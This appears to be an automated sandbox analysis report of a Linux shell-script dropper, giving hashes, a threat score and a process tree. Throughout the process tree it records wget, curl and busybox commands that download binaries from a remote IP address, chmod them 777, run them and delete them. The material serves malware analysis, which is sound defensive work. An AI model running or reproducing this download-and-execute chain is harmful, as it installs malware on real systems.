158202a011e2f210091d07822732a44a44b49799547ef81a718ea519282c5f5d

Analysis

max time kernel
41s
max time network
129s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
26-11-2024 01:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

17a882d74d8f0403825e466d27c6aa7a2d943753c07b52b4cb5eb38452b9f65a.sh
Size

10KB
MD5

25ac41911960743a3801b24c9889d0c1
SHA1

e6d32d6310d18a8bf4ff2fba8fecffae2e12ba4e
SHA256

17a882d74d8f0403825e466d27c6aa7a2d943753c07b52b4cb5eb38452b9f65a
SHA512

98f07a68c31eb173a2cf2e365d1af84975b7be0e880425c50d390b11ce14d3502be471f7bac02bf2ecf731080a07f1352116ed0ec2b55e2d8b318efa272a2967
SSDEEP

192:Y7m95hRUWj5PiUxYkAOFlNtNTWkAOFlK95hRUWi:Y7m95hWWjsUxRtC95hWWi

Score

7^/10

defense_evasion

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	process
1580	chmod
1598	chmod
1654	chmod
1648	chmod
1678	chmod
1550	chmod
1574	chmod
1628	chmod
1514	chmod
1562	chmod
1672	chmod
1636	chmod
1520	chmod
1538	chmod
1556	chmod
1604	chmod
1532	chmod
1544	chmod
1568	chmod
1526	chmod
1642	chmod
1666	chmod
1586	chmod
1616	chmod
1660	chmod
1592	chmod
1610	chmod
1622	chmod

Executes dropped EXE 28 IoCs

Processes:

BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YWevByMY4wmzNymjcp2tK0lMRkVdU65J5ieu8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGvK1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteSde1TCtowW4YXLK3aMQCLCu45FaZiSUUewLYPX20iXdE01EubuCO1vKPKpWurO2dtxnfvNFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4qWbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCObm4U9kz9o489NfSCsldH4iikrwNKhC0D83VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3dcWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4qWbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCOK1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteSde1TCtowW4YXLK3aMQCLCu45FaZiSUUewLYPX20iXdE01EubuCO1vKPKpWurO2dtxnfvbm4U9kz9o489NfSCsldH4iikrwNKhC0D83VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3dcWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg7257KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGvBFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YWevByMY4wmzNymjcp2tK0lMRkVdU65J5ieu8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO	curl
File opened for modification	/tmp/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv	curl
File opened for modification	/tmp/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8	curl
File opened for modification	/tmp/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72	curl
File opened for modification	/tmp/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv	curl
File opened for modification	/tmp/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d	curl
File opened for modification	/tmp/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO	curl
File opened for modification	/tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW	curl
File opened for modification	/tmp/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu	curl
File opened for modification	/tmp/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q	curl
File opened for modification	/tmp/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3	curl
File opened for modification	/tmp/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83	curl
File opened for modification	/tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW	curl
File opened for modification	/tmp/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3	curl
File opened for modification	/tmp/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu	curl
File opened for modification	/tmp/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS	curl
File opened for modification	/tmp/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83	curl
File opened for modification	/tmp/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS	curl
File opened for modification	/tmp/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8	curl
File opened for modification	/tmp/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv	curl
File opened for modification	/tmp/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju	curl
File opened for modification	/tmp/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju	curl
File opened for modification	/tmp/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q	curl
File opened for modification	/tmp/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d	curl
File opened for modification	/tmp/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72	curl
File opened for modification	/tmp/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL	curl
File opened for modification	/tmp/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv	curl
File opened for modification	/tmp/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL	curl

/tmp/17a882d74d8f0403825e466d27c6aa7a2d943753c07b52b4cb5eb38452b9f65a.sh
/tmp/17a882d74d8f0403825e466d27c6aa7a2d943753c07b52b4cb5eb38452b9f65a.sh
1⤵
PID:1506
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:1507
- /usr/bin/wget
  wget http://216.126.231.240/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  PID:1508
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  - Writes file to tmp directory
  PID:1512
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  PID:1513
- /bin/chmod
  chmod 777 BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  - File and Directory Permissions Modification
  PID:1514
- /tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  ./BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  - Executes dropped EXE
  PID:1515
- /bin/rm
  rm BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  PID:1516
- /usr/bin/wget
  wget http://216.126.231.240/bins/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  PID:1517
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  - Writes file to tmp directory
  PID:1518
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  PID:1519
- /bin/chmod
  chmod 777 evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  - File and Directory Permissions Modification
  PID:1520
- /tmp/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  ./evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  - Executes dropped EXE
  PID:1521
- /bin/rm
  rm evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  PID:1522
- /usr/bin/wget
  wget http://216.126.231.240/bins/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  PID:1523
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  - Writes file to tmp directory
  PID:1524
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  PID:1525
- /bin/chmod
  chmod 777 8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  - File and Directory Permissions Modification
  PID:1526
- /tmp/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  ./8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  - Executes dropped EXE
  PID:1527
- /bin/rm
  rm 8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  PID:1528
- /usr/bin/wget
  wget http://216.126.231.240/bins/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  PID:1529
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  - Writes file to tmp directory
  PID:1530
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  PID:1531
- /bin/chmod
  chmod 777 57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  - File and Directory Permissions Modification
  PID:1532
- /tmp/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  ./57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  - Executes dropped EXE
  PID:1533
- /bin/rm
  rm 57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  PID:1534
- /usr/bin/wget
  wget http://216.126.231.240/bins/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  PID:1535
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  - Writes file to tmp directory
  PID:1536
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  PID:1537
- /bin/chmod
  chmod 777 K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  - File and Directory Permissions Modification
  PID:1538
- /tmp/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  ./K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  - Executes dropped EXE
  PID:1539
- /bin/rm
  rm K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  PID:1540
- /usr/bin/wget
  wget http://216.126.231.240/bins/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  PID:1541
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  - Writes file to tmp directory
  PID:1542
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  PID:1543
- /bin/chmod
  chmod 777 n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  - File and Directory Permissions Modification
  PID:1544
- /tmp/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  ./n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  - Executes dropped EXE
  PID:1545
- /bin/rm
  rm n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  PID:1546
- /usr/bin/wget
  wget http://216.126.231.240/bins/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  PID:1547
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  - Writes file to tmp directory
  PID:1548
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  PID:1549
- /bin/chmod
  chmod 777 de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  - File and Directory Permissions Modification
  PID:1550
- /tmp/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  ./de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  - Executes dropped EXE
  PID:1551
- /bin/rm
  rm de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  PID:1552
- /usr/bin/wget
  wget http://216.126.231.240/bins/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  PID:1553
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  - Writes file to tmp directory
  PID:1554
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  PID:1555
- /bin/chmod
  chmod 777 YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  - File and Directory Permissions Modification
  PID:1556
- /tmp/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  ./YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  - Executes dropped EXE
  PID:1557
- /bin/rm
  rm YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  PID:1558
- /usr/bin/wget
  wget http://216.126.231.240/bins/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  PID:1559
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  - Writes file to tmp directory
  PID:1560
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  PID:1561
- /bin/chmod
  chmod 777 NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  - File and Directory Permissions Modification
  PID:1562
- /tmp/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  ./NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  - Executes dropped EXE
  PID:1563
- /bin/rm
  rm NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  PID:1564
- /usr/bin/wget
  wget http://216.126.231.240/bins/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  PID:1565
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  - Writes file to tmp directory
  PID:1566
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  PID:1567
- /bin/chmod
  chmod 777 WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  - File and Directory Permissions Modification
  PID:1568
- /tmp/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  ./WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  - Executes dropped EXE
  PID:1569
- /bin/rm
  rm WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  PID:1570
- /usr/bin/wget
  wget http://216.126.231.240/bins/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  PID:1571
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  - Writes file to tmp directory
  PID:1572
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  PID:1573
- /bin/chmod
  chmod 777 bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  - File and Directory Permissions Modification
  PID:1574
- /tmp/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  ./bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  - Executes dropped EXE
  PID:1575
- /bin/rm
  rm bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  PID:1576
- /usr/bin/wget
  wget http://216.126.231.240/bins/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  PID:1577
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  - Writes file to tmp directory
  PID:1578
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  PID:1579
- /bin/chmod
  chmod 777 VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  - File and Directory Permissions Modification
  PID:1580
- /tmp/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  ./VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  - Executes dropped EXE
  PID:1581
- /bin/rm
  rm VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  PID:1582
- /usr/bin/wget
  wget http://216.126.231.240/bins/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  PID:1583
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  - Writes file to tmp directory
  PID:1584
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  PID:1585
- /bin/chmod
  chmod 777 SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  - File and Directory Permissions Modification
  PID:1586
- /tmp/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  ./SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  - Executes dropped EXE
  PID:1587
- /bin/rm
  rm SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  PID:1588
- /usr/bin/wget
  wget http://216.126.231.240/bins/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  PID:1589
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  - Writes file to tmp directory
  PID:1590
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  PID:1591
- /bin/chmod
  chmod 777 cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  - File and Directory Permissions Modification
  PID:1592
- /tmp/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  ./cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  - Executes dropped EXE
  PID:1593
- /bin/rm
  rm cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  PID:1594
- /usr/bin/wget
  wget http://216.126.231.240/bins/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  PID:1595
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  - Writes file to tmp directory
  PID:1596
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  PID:1597
- /bin/chmod
  chmod 777 NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  - File and Directory Permissions Modification
  PID:1598
- /tmp/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  ./NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  - Executes dropped EXE
  PID:1599
- /bin/rm
  rm NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  PID:1600
- /usr/bin/wget
  wget http://216.126.231.240/bins/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  PID:1601
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  - Writes file to tmp directory
  PID:1602
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  PID:1603
- /bin/chmod
  chmod 777 WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  - File and Directory Permissions Modification
  PID:1604
- /tmp/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  ./WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  - Executes dropped EXE
  PID:1605
- /bin/rm
  rm WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  PID:1606
- /usr/bin/wget
  wget http://216.126.231.240/bins/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  PID:1607
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  - Writes file to tmp directory
  PID:1608
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  PID:1609
- /bin/chmod
  chmod 777 K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  - File and Directory Permissions Modification
  PID:1610
- /tmp/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  ./K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  - Executes dropped EXE
  PID:1611
- /bin/rm
  rm K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  PID:1612
- /usr/bin/wget
  wget http://216.126.231.240/bins/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  PID:1613
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  - Writes file to tmp directory
  PID:1614
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  PID:1615
- /bin/chmod
  chmod 777 n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  - File and Directory Permissions Modification
  PID:1616
- /tmp/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  ./n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  - Executes dropped EXE
  PID:1617
- /bin/rm
  rm n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  PID:1618
- /usr/bin/wget
  wget http://216.126.231.240/bins/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  PID:1619
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  - Writes file to tmp directory
  PID:1620
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  PID:1621
- /bin/chmod
  chmod 777 de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  - File and Directory Permissions Modification
  PID:1622
- /tmp/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  ./de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  - Executes dropped EXE
  PID:1623
- /bin/rm
  rm de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  PID:1624
- /usr/bin/wget
  wget http://216.126.231.240/bins/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  PID:1625
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  - Writes file to tmp directory
  PID:1626
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  PID:1627
- /bin/chmod
  chmod 777 YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  - File and Directory Permissions Modification
  PID:1628
- /tmp/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  ./YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  - Executes dropped EXE
  PID:1629
- /bin/rm
  rm YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  PID:1630
- /usr/bin/wget
  wget http://216.126.231.240/bins/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  PID:1631
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  - Writes file to tmp directory
  PID:1632
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  PID:1633
- /bin/chmod
  chmod 777 bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  - File and Directory Permissions Modification
  PID:1636
- /tmp/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  ./bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  - Executes dropped EXE
  PID:1637
- /bin/rm
  rm bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  PID:1638
- /usr/bin/wget
  wget http://216.126.231.240/bins/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  PID:1639
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  - Writes file to tmp directory
  PID:1640
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  PID:1641
- /bin/chmod
  chmod 777 VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  - File and Directory Permissions Modification
  PID:1642
- /tmp/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  ./VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  - Executes dropped EXE
  PID:1643
- /bin/rm
  rm VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  PID:1644
- /usr/bin/wget
  wget http://216.126.231.240/bins/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  PID:1645
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  - Writes file to tmp directory
  PID:1646
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  PID:1647
- /bin/chmod
  chmod 777 SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  - File and Directory Permissions Modification
  PID:1648
- /tmp/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  ./SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  - Executes dropped EXE
  PID:1649
- /bin/rm
  rm SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  PID:1650
- /usr/bin/wget
  wget http://216.126.231.240/bins/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  PID:1651
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  - Writes file to tmp directory
  PID:1652
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  PID:1653
- /bin/chmod
  chmod 777 cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  - File and Directory Permissions Modification
  PID:1654
- /tmp/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  ./cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  - Executes dropped EXE
  PID:1655
- /bin/rm
  rm cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  PID:1656
- /usr/bin/wget
  wget http://216.126.231.240/bins/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  PID:1657
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  - Writes file to tmp directory
  PID:1658
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  PID:1659
- /bin/chmod
